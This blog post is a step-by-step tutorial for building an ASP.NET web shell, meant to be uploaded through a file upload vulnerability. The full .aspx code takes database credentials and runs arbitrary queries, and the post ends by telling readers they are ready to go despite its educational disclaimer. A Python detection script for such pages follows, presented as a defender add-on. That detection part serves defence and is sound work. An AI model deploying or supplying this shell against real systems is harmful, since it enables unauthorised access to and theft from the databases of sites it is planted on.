Create ASP.NET Database Backdoor Shell

This post does not encourage any kind of malicious activity. It is intended for educational purposes only. Anyone using this code does so at their own risk. The developer is not responsible for any misuse.

Assumption
———
1. The ASP.NET application has a file upload vulnerability.
2. We have obtained the username, password, database name and server name of the database, or we can use the connection string from Web.config directly, in which case those fields are not needed.

To use this technique we must first find a file upload vulnerability in the ASP.NET application.

To create a DB backdoor we need to know the database server. ASP.NET applications mostly use MS SQL Server as the database; sometimes it can be MySQL, SQLite, Oracle, etc.

The developer should identify which database server the vulnerable web application uses.

Let’s get started.

1. Create an aspx page
First we need to create an aspx page without a C# code-behind page. We are going to use inline ASP.NET code in the design page itself.

<%@ Page Language="C#" EnableViewState="false" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ASPX Shell</title>
</head>
<body>
<form id="form1" runat="server">
</form>
</body>
</html>

2. Add basic fields
After adding the empty aspx page we need to add the input fields whose values are passed to the connection string, as well as the query to be executed.

Server Name : <asp:TextBox ID="txtServer" runat="server"></asp:TextBox> 

User Name :   <asp:TextBox ID="txtUName" runat="server"></asp:TextBox> 

Passcode :    <asp:TextBox ID="txtPass" runat="server"></asp:TextBox> 

DB Name :     <asp:TextBox ID="txtDBName" runat="server"></asp:TextBox>

Query :  <asp:TextBox TextMode="MultiLine" ID="txtQuery" runat="server"></asp:TextBox>

<asp:Button ID="btnRun" runat="server" Text="Run Query"/> 

3. Add GridView to display the result
When Run Query is clicked, the query needs to be executed and the result set displayed. To display the result set we can use a GridView.

<asp:GridView ID="grdResult" runat="server"></asp:GridView>

4. Add assembly references
For database communication we need to add assembly references; add them using the Import Namespace directive.

<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data.Odbc" %>
<%@ Import Namespace="System.Data.SqlClient" %>

5. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding.

<%
try
{
    if (!string.IsNullOrWhiteSpace(txtDBName.Text) && !string.IsNullOrWhiteSpace(txtServer.Text) && !string.IsNullOrWhiteSpace(txtUName.Text) && !string.IsNullOrWhiteSpace(txtPass.Text))
    {
        using (OdbcConnection connection = new OdbcConnection("DRIVER={MySQL ODBC 3.51 Driver};Database=" + txtDBName.Text + ";Server=" + txtServer.Text + ";UID=" + txtUName.Text + ";PWD=" + txtPass.Text + ";"))
        {
            connection.Open();
            using (OdbcCommand command = new OdbcCommand(txtQuery.Text, connection))
            using (OdbcDataReader dr = command.ExecuteReader())
            {
                grdResult.DataSource = dr;
                grdResult.DataBind();
            }
            connection.Close();
        }
    }
}
catch (Exception ex)
{
    Response.Write("An error occurred: " + ex.Message);
}
%>

With this logic you can create any database connection; the example here is a MySQL connection.
To use another database, modify the connection string part.

That’s it. You are ready to go.
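
For defenders, the page assembled in steps 1 to 5 has a recognisable shape: no code-behind, inline server code, ADO.NET types used from markup, and a command built from a text box. The Python sketch below is an added example, not part of the original post; the rule names, the scoring and the two constructed samples are assumptions, and the patterns are heuristics rather than a complete web shell signature.

```python
import re
from pathlib import Path

# Heuristics derived from the page built in this post; assumed, not exhaustive.
RULES = {
    # Inline <% ... %> server code (directives, comments and bindings excluded)
    "inline_code": re.compile(r"<%(?![@#=:$-])"),
    # ADO.NET client types referenced directly from markup
    "db_client": re.compile(r"\b(?:Odbc|Sql|OleDb)(?:Connection|Command)\b"),
    # Command text taken straight from a server control
    "query_from_input": re.compile(r"new\s+\w*Command\s*\(\s*\w+\.Text\b"),
    # Connection string concatenated from server-control values
    "connstr_from_input": re.compile(r"new\s+\w*Connection\s*\([^)]*\+\s*\w+\.Text\b"),
}
CODE_BEHIND = re.compile(r"<%@\s*Page\b[^%]*\b(?:CodeBehind|CodeFile|Inherits)\s*=", re.I)

def findings(markup):
    """Return the names of all heuristics that fire on one .aspx file's text."""
    hits = [name for name, rx in RULES.items() if rx.search(markup)]
    if not CODE_BEHIND.search(markup):
        hits.append("no_code_behind")
    return hits

def is_suspicious(markup):
    """Inline code + DB client + query or connection string built from user input."""
    hits = set(findings(markup))
    from_input = hits & {"query_from_input", "connstr_from_input"}
    return {"inline_code", "db_client"} <= hits and bool(from_input)

def scan(root):
    """Return {path: findings} for every suspicious .aspx under root (e.g. an upload directory)."""
    out = {}
    for path in Path(root).rglob("*.aspx"):
        text = path.read_text(encoding="utf-8", errors="replace")
        if is_suspicious(text):
            out[str(path)] = findings(text)
    return out

# Constructed samples: key lines of the page from this post, and an ordinary code-behind page.
SAMPLE_SHELL = '''<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Data.Odbc" %>
<% using (OdbcConnection connection = new OdbcConnection("Database=" + txtDBName.Text + ";"))
   using (OdbcCommand command = new OdbcCommand(txtQuery.Text, connection)) { } %>'''
SAMPLE_BENIGN = '''<%@ Page Language="C#" CodeBehind="Orders.aspx.cs" Inherits="Shop.Orders" %>
<asp:GridView ID="grdOrders" runat="server"></asp:GridView>'''

if __name__ == "__main__":
    print(findings(SAMPLE_SHELL), is_suspicious(SAMPLE_BENIGN))
```

Point `scan()` at directories that accept uploads; any .aspx file found there at all deserves review, and one that also matches these rules should be treated as an incident.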

About tvskumar2000